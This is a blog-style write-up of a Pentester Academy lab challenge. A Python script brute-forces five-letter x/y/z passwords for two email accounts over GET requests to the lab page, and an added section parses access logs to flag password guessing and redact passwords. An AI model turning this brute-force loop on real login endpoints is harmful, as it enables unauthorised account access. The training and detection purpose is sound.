Pentester Academy GET Method Challenge 1 via Python



Challenge 1 for Pentester Academy uses the GET method to send the credentials, so the username and password go like:

Also, one big hint dropped here is that the domain is PentesterAcademy.com. So the email addresses would look like admin@PentesterAcademy.com and jack@PentesterAcademy.com.
I reused the code for generating all combinations of x, y and z from my previous blog post aimed at challenge 3. We just need to update the URL with the username and the password while sending the request for each combination.

But how do we verify if the credentials have been accepted as valid or rejected? The webpage says “Failed! Please try again!” if the credentials are rejected. So we can search for the string “Failed” in the response to check if the credentials were accepted.

The complete solution looks as follows:
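import sys
import urllib.request


def fun(a):
    # Recursively prepend each of x, y and z until every candidate is 5 characters long.
    chars = "xyz"
    lengthPerWord = len(a[0])
    if lengthPerWord == 5:
        return a
    c = []
    for word in a:
        for j in chars:
            c.append(j + word)
    return fun(c)


c = ['x', 'y', 'z']
listOfPass = fun(c)

for user in ["admin", "jack"]:
    for password in listOfPass:
        # The credentials travel in the query string of the GET request.
        url = ("http://pentesteracademylab.appspot.com/lab/webapp/1?email=%s&password=%s") % (user + "@PentesterAcademy.com", password)
        r = urllib.request.Request(url)
        handle = urllib.request.urlopen(r)

        # read() returns bytes, so decode before searching the body.
        response = handle.read().decode("utf-8", errors="replace")
        handle.close()
        # The page shows "Failed! Please try again!" when the credentials are rejected.
        if "Failed" not in response:
            print("Succeeded for " + user + ":" + password)
            print(response)
            sys.exit(0)
        else:
            print("Failed for " + user + ":" + password)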
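
Because the credentials ride in the query string, every attempt made this way is written in full to the web server's access log. The following is an added example, not part of the original post: it parses constructed log lines and flags any source that tries several distinct passwords against one email. The log format, IP addresses, sample passwords, function names and the threshold of 3 are all assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /lab/webapp/1?email=admin@PentesterAcademy.com&password=xxxxx HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /lab/webapp/1?email=admin@PentesterAcademy.com&password=yxxxx HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lab/webapp/1?email=admin@PentesterAcademy.com&password=zxxxx HTTP/1.1" 200 512
198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lab/webapp/1?email=admin@PentesterAcademy.com&password=xyxxx HTTP/1.1" 200 512
203.0.113.20 - - [01/Jan/2024:10:03:10 +0000] "GET /index.html HTTP/1.1" 200 1024
203.0.113.20 - - [01/Jan/2024:10:03:15 +0000] "GET /lab/webapp/1?email=jack@PentesterAcademy.com&password=typo1 HTTP/1.1" 200 512
203.0.113.20 - - [01/Jan/2024:10:03:30 +0000] "GET /lab/webapp/1?email=jack@PentesterAcademy.com&password=typo1 HTTP/1.1" 200 512
"""

# Source IP and request target of a GET line in common log format.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" \d{3} ')

def credential_requests(log_text):
    """Yield (source_ip, email, password) for GET requests carrying a password parameter."""
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        params = parse_qs(urlsplit(target).query)
        if "password" in params:
            yield ip, params.get("email", [""])[0], params["password"][0]

def flag_guessing(log_text, threshold=3):
    """Return {(ip, email): n} where one source tried >= threshold distinct passwords."""
    tried = defaultdict(set)
    for ip, email, password in credential_requests(log_text):
        tried[(ip, email)].add(password)
    return {key: len(pw) for key, pw in tried.items() if len(pw) >= threshold}

def redact(line):
    """Mask password values so a log line can be shared during triage."""
    return re.sub(r'(password=)[^&\s"]*', r'\1[REDACTED]', line)

if __name__ == "__main__":
    for (ip, email), n in flag_guessing(SAMPLE_LOG).items():
        print(f"{ip} tried {n} distinct passwords for {email}")
    print(redact(SAMPLE_LOG.splitlines()[0]))
```

Submitting the login form with POST keeps the password out of these log lines, and the per-source count computed here is the same value a rate limit or lockout would key on.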
